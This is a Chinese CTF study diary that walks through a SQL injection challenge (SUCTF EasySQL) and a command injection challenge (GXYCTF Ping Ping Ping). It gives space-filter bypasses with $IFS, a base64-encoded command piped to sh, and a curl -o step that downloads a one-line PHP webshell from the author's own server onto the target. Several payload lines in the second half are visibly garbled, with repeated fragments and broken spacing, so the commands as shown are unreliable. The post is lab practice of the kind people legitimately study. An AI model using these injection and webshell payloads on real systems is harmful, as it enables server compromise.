CTF学习日记(9)
XCTF挂了,今天换了其他平台做题,感觉还是XCTF的题有条理一点
[SUCTF 2019]EasySQL 1
这题挺离谱的,我试了好几种方法都没办法成功注入。看完几个师傅的wp才看懂
这是一个讲的比较好的师傅
[SUCTF 2019]EasySQL 1
可以看到,布尔盲注、时间盲注、联合查询均不起作用,都被过滤了。
但是堆叠查询可以执行
据说可以猜出后端代码是
select $_POST[‘query’] || flag from flag
我是不知道怎么能猜出来
基于这个猜测的前提下,我们将payload改为
*,1
那么拼接的代码就变成了
select *,1 || flag from flag
将1||flag单独运算得到1,那么剩下的代码就是
select *,1 from flag
得到flag。
[GXYCTF2019]Ping Ping Ping
熟悉的命令执行,很有意思的一道题目。
进去首页提示你使用GET方式传输ip
很明显的RCE了,那来试一下
?ip=1||ls
发现可以正常执行(其实理论上应该是不行的,因为||运算符只会在前一条命令失败后才会执行下一条)
可有看到当前目录文件
尝试cat flag,提示
我当时以为是让我去捣鼓直接的空间(自己的服务器),其实是空格的意思。
cat index.php之后还是提示fuck your space
其实到这里就应该反应过来过滤空格了,可是我还是在尝试了好多命令之后将命令和提示结合才发现空格被过滤了。
绕过空格过滤
百度搜索“linux命令绕过空格”,就可以得到很多方法,我这里也记录一下
cat${IFS}flag.txt
cat$IFS$9flag.txt
cat<flag.txt
cat<>flag.txt
cat \x20 flag.txt
其中1、2使用了环境变量替代的方法。$IFS是分隔符环境变量,而9在没有被赋值的情况下是null。
我的理解是,这里是为了将IFS和后面的参数分隔开,当后面的参数为英文字母时使用$ifs$9,当后面的参数为数字开头时,则不能使用$9,否则会将参数作为环境变量。
那么此时查看一下flag,发现提示fuck your flag。
查看index.php
可以看到,许多符号以及空格都被过滤了,bash也被过滤了,flag也进行了贪婪匹配。
我当时以为是只要在字符串中发现了flag四个字母就会被ban,其实四个字母需要按照顺序出现才会
payload
环境变量替换
那么我们第一个payload就是使用的这个思路:更改flag的顺序
?ip=1;export$IFS 9 p = g ; c a t 9p=g;cat 9p=g;catIFS 9 f l a 9fla 9flap.php
但是这里输出之后是不会在页面显示的,需要查看页面源代码才可以看到flag
这个方法是我看网上的教程,应该是最简洁的思路。
上马
我在尝试使用curl www.baidu.com 成功之后发现这个靶机可以访问外网
于是我尝试使用自己的服务器作为目标机,使用curl -o保存一句话木马,上马来获取flag,这个方法也成功了
?ip=1;export$IFS 9 p = g ; c u r l 9p=g;curl 9p=g;curlIFS 9 − o 9-o 9−oIFS 9 h a c k . p h p 9hack.php 9hack.phpIFS$9hackerkofi.top:8080
内联执行
/?ip=2.2.2.2;cat$IFS$1`ls`
这里是将``内的返回值作为输入,那么此时就可以cat了。
官方flag
echo$IFS 1 Y 2 F 0 I G Z s Y W c u c G h w ∣ b a s e 64 1Y2F0IGZsYWcucGhw|base64 1Y2F0IGZsYWcucGhw∣base64IFS$1-d|sh
将cat flag.php进行base64编码后再解码
7199
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
